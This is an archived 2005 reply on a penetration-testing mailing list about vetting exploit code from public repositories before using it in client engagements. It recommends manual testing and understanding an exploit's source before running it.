Penetration Testing mailing list archives
RE: Exploit Repositories and Due Diligence
From: "Sahir Hidayatullah" <sahirh () mielesecurity com>
Date: Fri, 10 Jun 2005 12:19:30 +0530
Good question! Personally, I feel exploit repositories only speed up the time it takes to identify whether an exploit exists or not. You'll invariably find that the exploit code itself gives insufficient information about the vulnerability in the comments, so you'll hit Securityfocus' or similar for more information. You *could* just get the exploit from there, but when you're in the middle of a test and you discover something not so standard (for example some random embedded device) you want to quickly look up whether an exploit exists. If you have testers that are just gcc'ing the exploit and firing it at a target without understanding the source, you're asking for trouble especially with respect to non-standard systems. What I have noticed is people relying too much on exploit repositories, they will identify a system, search the repository, and if they don't find a match, move on. This totally skips the creative process of approaching the system manually looking for 'common' problems -- broken authentication, default passwords etc. The way I like to work is ID the systems and their services, and make a table of exploits that I could tentatively use against each service. Then move to manual testing, if nothing comes out of that, pick an exploit, understand it, and if it passes the test, give it a shot. That said, updatable exploit repositories like SecurityForest (CVS based) are a godsend for managing your collection, and a great start for building one. Regards, Sahir Hidayatullah Technical Consultant - Information Security -------------------------------------- MIEL e-Security Pvt. Ltd. C- 611 / 612, Floral Deck Plaza, MIDC Central Road, Andheri (E), Mumbai 400 093, India. Tel No:+ 91 (022) 2821 5050 PGP KeyID: 0x4F5EC345 Fingerprint: F4C2 7274 792E 8E39 D90D BA02 C070 B4BF 4F5E C345 -----Original Message----- From: Jeff [mailto:jb () jbware net] Sent: Friday, June 10, 2005 6:50 AM To: pen-test () securityfocus com Subject: Exploit Repositories and Due Diligence I have a question regarding the use of exploit repositories (including projects like Metaploit, and compliations on bootable distros like Whoppix). With all of the large exploit repositories used to make pen testing faster and easier, what methods do you use to ensure you've done your due diligence in not unleashing something actually harmful on your clients? I have my own thoughts, such as googling and superficial|deep code reviews, but ultimately my concern is over the malcious hiding of intentions. Thanks for any insights and suggestions. - Jeff
Current thread:
- RE: SQL injection Todd Towles (Jun 09)
- <Possible follow-ups>
- Re: SQL injection Davi Ottenheimer (Jun 09)
- RE: SQL injection Bénoni MARTIN (Jun 09)
- Re: RE: SQL injection travis . barlow (Jun 09)
- RE: SQL injection Ofer Shezaf (Jun 09)
- RE: SQL injection Hecber Cordova (Jun 09)
- Exploit Repositories and Due Diligence Jeff (Jun 09)
- RE: Exploit Repositories and Due Diligence Leandro Reox (Jun 09)
- RE: Exploit Repositories and Due Diligence Sahir Hidayatullah (Jun 10)
- RE: Exploit Repositories and Due Diligence Carl Tucker (Jun 14)
- RE: Exploit Repositories and Due Diligence Carl Tucker (Jun 20)
- RE: SQL injection Hecber Cordova (Jun 09)
- Re: SQL injection Tim (Jun 09)
- Re: SQL injection James Riden (Jun 09)
- RE: SQL injection Leandro Reox (Jun 09)
- RE: SQL injection Todd Towles (Jun 09)
- RE: SQL injection Leandro Reox (Jun 10)
- Re: SQL injection Hernán M . Racciatti (Jun 10)
- Re: SQL injection DokFLeed (Jun 10)
- RE: SQL injection Leandro Reox (Jun 10)